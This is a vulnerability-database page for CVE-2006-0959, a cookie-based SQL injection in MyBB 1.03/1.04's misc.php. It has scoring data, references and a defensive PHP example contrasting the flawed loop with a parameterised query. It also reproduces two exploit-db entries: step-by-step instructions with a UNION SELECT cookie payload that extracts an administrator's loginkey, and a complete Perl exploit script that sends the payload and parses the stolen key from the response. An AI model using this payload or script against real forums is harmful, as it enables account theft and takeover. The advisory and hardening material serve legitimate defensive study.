CVE-2006-0959
CVSS 7.5
Published: 2006-03-02 18:02:00
Revised: 2011-08-05 00:00:00
NMCOE    

[Original] SQL injection vulnerability in misc.php in MyBulletinBoard (MyBB) 1.03, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands by setting the comma variable value via the comma parameter in a cookie. NOTE: 1.04 has also been reported to be affected.


[CNNVD] MyBulletinBoard 'misc.php' SQL Injection Vulnerability (CNNVD-200603-004)

        An SQL injection vulnerability exists in misc.php in MyBulletinBoard (MyBB) 1.03. When register_globals is enabled, remote attackers can execute arbitrary SQL commands by setting the comma variable value through the comma parameter in a cookie. Note: version 1.04 has also been reported to be affected.

- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CWE (Weakness Category)

CWE-89 [Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')]

- CPE (Affected Platforms and Products)

cpe:/a:mybulletinboard:mybulletinboard:1.0.3
cpe:/a:mybulletinboard:mybulletinboard:1.0.4

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0959
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0959
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-004
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/24953
(UNKNOWN)  XF  mybb-misc-sql-injection(24953)
http://www.vupen.com/english/advisories/2006/0774
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0774
http://www.securityfocus.com/bid/16631
(UNKNOWN)  BID  16631
http://www.securityfocus.com/archive/1/archive/1/426653/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060303 MyBB 1.04 Perl Exploit
http://www.securityfocus.com/archive/1/archive/1/426320/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060228 MyBB 1.3 NewSQL Injection
http://www.osvdb.org/23554
(UNKNOWN)  OSVDB  23554
http://securityreason.com/securityalert/512
(UNKNOWN)  SREASON  512
http://secunia.com/advisories/19061
(VENDOR_ADVISORY)  SECUNIA  19061
http://milw0rm.com/exploits/1539
(UNKNOWN)  MILW0RM  1539

- Vulnerability Information

MyBulletinBoard 'misc.php' SQL Injection Vulnerability
High risk  SQL injection
2006-03-02 00:00:00 2006-10-05 00:00:00
Remote
        An SQL injection vulnerability exists in misc.php in MyBulletinBoard (MyBB) 1.03. When register_globals is enabled, remote attackers can execute arbitrary SQL commands by setting the comma variable value through the comma parameter in a cookie. Note: version 1.04 has also been reported to be affected.

- Advisories and Patches

        The vendor has not yet released a patch or upgrade for this vulnerability. Users of this software are advised to watch the vendor's homepage for the latest version.

- Vulnerability Information (1539)

MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection (EDBID:1539)
php webapps
2006-02-28 Verified
0 Devil-00
N/A
MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Linez :-

[code]
	$buddies = $mybb->user['buddylist'];
	$namesarray = explode(",",$buddies);
	if(is_array($namesarray))
	{
		while(list($key, $buddyid) = each($namesarray))
		{
			$sql .= "$comma'$buddyid'"; // <== HERE :) Uncleared var !!
			$comma = ",";
		}
	$timecut = time() - $mybb->settings['wolcutoff'];
	$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]

From 255 to 265

The GLOBALS unset function .. does not unset $_COOKIES ..
then you can start attacking any var by cookies :)

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Log in with any username ..
2- Create new cookie (
	name 	=> "comma"
	value	=> "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*")

3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = the victim server and PATH = the MyBB directory.

# milw0rm.com [2006-02-28]
		
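For the defender's reading of the excerpt above: the `IN (...)` list is assembled from a `$comma` that is never initialised and from `$buddyid` values that are interpolated as-is, so at file scope with register_globals on, a cookie named `comma` supplies the first thing written into the query. The following is an added example, not MyBB's code or the poster's: it reproduces that loop shape with the register_globals import made explicit, beside a hardened version that initialises its variables, reduces the buddy list to positive integers and emits bound placeholders. The function names, the `mybb_` table prefix and the sample buddy list and cookie are constructed for the example.

```php
<?php
// Added example (not MyBB's own code). Table names assume the default "mybb_" prefix.

// Vulnerable shape. misc.php runs at file scope, so with register_globals=On a
// cookie named "comma" pre-seeds $comma; the explicit line below stands in for
// that implicit import. Otherwise $comma is undefined on the first iteration,
// and $buddyid is interpolated without casting or escaping.
function buildBuddyQueryVulnerable(string $buddies, array $cookies): string
{
    $comma = $cookies['comma'] ?? null;   // what register_globals would have done
    $sql = '';
    foreach (explode(',', $buddies) as $buddyid) {
        $sql .= "$comma'$buddyid'";
        $comma = ',';
    }
    return "SELECT u.*, g.canusepms FROM mybb_users u "
         . "LEFT JOIN mybb_usergroups g ON (g.gid=u.usergroup) "
         . "WHERE u.uid IN ($sql)";
}

// Hardened shape: every variable is initialised locally, the buddy list is
// reduced to positive integers, and the IN list consists only of placeholders.
// Returns the SQL plus the parameter array to bind in a prepared statement.
function buildBuddyQuerySafe(string $buddies): array
{
    $ids = array_values(array_filter(
        array_map('intval', explode(',', $buddies)),
        fn(int $id): bool => $id > 0
    ));
    if ($ids === []) {
        return ['sql' => null, 'params' => []];   // nothing to look up; skip the query
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT u.*, g.canusepms FROM mybb_users u "
         . "LEFT JOIN mybb_usergroups g ON (g.gid=u.usergroup) "
         . "WHERE u.uid IN ($placeholders)";
    return ['sql' => $sql, 'params' => $ids];
}

// Constructed sample input: a stored buddy list and a cookie the client controls.
$buddylist = '5,12';
$cookies   = ['comma' => '<cookie-controlled text>'];

// The cookie text appears verbatim inside the WHERE clause.
echo buildBuddyQueryVulnerable($buddylist, $cookies), PHP_EOL;

// Non-numeric and negative entries are dropped; only placeholders reach the SQL.
$safe = buildBuddyQuerySafe($buddylist . ',abc,-3');
echo $safe['sql'], PHP_EOL;
echo implode(',', $safe['params']), PHP_EOL;
```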

- Vulnerability Information (1548)

MyBulletinBoard (MyBB) <= 1.04 (misc.php COMMA) SQL Injection (2) (EDBID:1548)
php webapps
2006-03-03 Verified
0 Devil-00
N/A
#!/usr/bin/perl -w

# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
#			http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;

##-- Start --#

$host 	= "127.0.0.1";
$path		= "/mybb3/";
$userid	= 1;
$mycookie 	= "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";

##-- _END_ --##
#	$host		:-
#				The Host Name Without http:// | exm. www.vic.com
#
#	$path		:-
#				MyBB Dir On Server | exm. /mybb/
#
#	$userid	:-
#				The ID Of The User U Wanna To Get His Loginkey
#
#	$cookie	:-
#				You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#	
#				$cookie 	= "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
										PeerAddr => "$host",
										PeerPort	=> "80",
										Proto		=> "tcp"
										) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##										
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##						
$evildata  = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";

print $sock $evildata;

while($ans = <$sock>){
	$ans =~ m/<a href=\"member.php\?action=profile&amp;uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}

# milw0rm.com [2006-03-03]
		

- Vulnerability Information

23554
MyBulletinBoard (MyBB) Cookie comma Value SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- Vulnerability Description

Unknown or Incomplete

- Timeline

2006-02-28 Unknown
2006-02-28 Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete